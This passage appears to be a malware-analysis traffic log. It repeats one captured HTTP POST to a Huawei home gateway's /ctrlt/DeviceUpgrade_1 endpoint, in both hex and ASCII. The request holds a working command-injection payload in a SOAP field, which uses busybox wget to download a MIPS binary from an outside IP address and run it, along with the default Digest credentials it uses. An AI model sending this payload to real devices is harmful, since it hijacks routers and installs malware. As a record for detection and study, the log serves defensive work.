6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 